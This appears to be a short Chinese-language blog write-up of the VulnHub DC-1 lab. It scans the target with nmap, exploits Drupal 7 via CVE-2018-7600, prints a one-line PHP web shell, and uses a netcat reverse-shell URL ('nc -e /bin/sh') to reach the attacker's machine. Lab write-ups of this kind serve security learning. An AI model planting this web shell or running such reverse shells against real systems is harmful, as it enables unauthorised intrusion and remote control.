VulnHub-DC1
尋找DC-1靶機
1 | $ nmap 10.0.2.4 -A -p- |
發現有port 80 -> 直接瀏覽網頁
使用wappalyzer得知使用Drupal 7
搜尋已知Exploit來取得RCE
- CVE-2018-7600
ls -> 發現flag1
發現有shell.php
1 | if( isset( $_REQUEST['c'])) { system( $_REQUEST['c'] . ' 2>&1 ');}> |
使用nc 監聽取回reverse shell(python pty)
1 | http://10.0.2.4/shell.php?c=nc%20-e%20%2Fbin%2Fsh%2010.0.2.15%208080 |
本部落格所有文章除特別聲明外,均採用 CC BY-NC-SA 4.0 許可協議。轉載請註明來自 LuYee6813's Blog!